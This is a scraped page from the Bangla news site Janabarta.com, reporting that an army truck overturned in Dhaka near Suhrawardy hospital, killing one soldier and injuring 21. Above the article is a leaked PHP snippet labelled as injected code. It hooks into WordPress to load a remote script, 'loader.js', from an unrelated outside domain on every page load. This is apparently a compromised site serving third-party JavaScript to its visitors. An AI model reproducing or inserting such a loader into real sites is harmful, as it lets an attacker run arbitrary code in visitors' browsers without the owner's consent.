// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site রাজধানীতে সড়ক দুর্ঘটনায় সেনাসদস্য নিহত, আহত ২১ - Janabarta.com

রাজধানীতে সড়ক দুর্ঘটনায় সেনাসদস্য নিহত, আহত ২১

নিজস্ব প্রতিবেদক: রাজধানীতে সেনাবাহিনীর একটি ট্রাক উল্টে ঘটনাস্থলেই এক জন সেনা সদস্য নিহত ও ২১ জন আহত হয়েছেন। আজ বৃহস্পতিবার সকালে শহীদ সোহরাওয়ার্দী মেডিকেল কলেজ হাসপাতালের সামনের সড়কে এ দুর্ঘটনা ঘটে।

বিষয়টি নিশ্চিত করে আন্তঃবাহিনী জনসংযোগ পরিদপ্তর (আইএসপিআর) জানায়, আজ সকালে সাভার সেনানিবাস থেকে কনভয়ের একটি তিন টন ট্রাক জাজিরা সেনানিবাসে যাচ্ছিল। পথিমধ্যে রাজধানীর সোহরাওয়ার্দী হাসপাতালের সামনে বিপরীত দিক থেকে আসা একটি সাইকেল আরোহীকে বাঁচাতে গিয়ে নিয়ন্ত্রণ হারিয়ে দুর্ঘটনার শিকার হয়।

এ সময় প্রিন্স নামে এক সেনা সদস্য ঘটনাস্থলেই মৃত্যুবরণ করেন। ট্রাকে থাকা বাকি ২১ সেনা সদস্য আহত হন। তাদের সঙ্গে সঙ্গেই সম্মিলিত সামরিক হাসপাতালে (সিএমএইচ) নিয়ে যাওয়া হয়। বর্তমানে সেখানে তারা চিকিৎসাধীন।

শেরেবাংলা নগর থানার ওসি জানে আলম মুনশি গণমাধ্যমকে বলেন, সংবাদ পাওয়ার পর ঘটনাস্থলে গিয়ে দেখি সেনাবাহিনীর গাড়িটি উল্টে রাস্তার পাশে পড়ে রয়েছে। এর আগেই আহতদের চিকিৎসার জন্য নিয়ে যাওয়া হয়।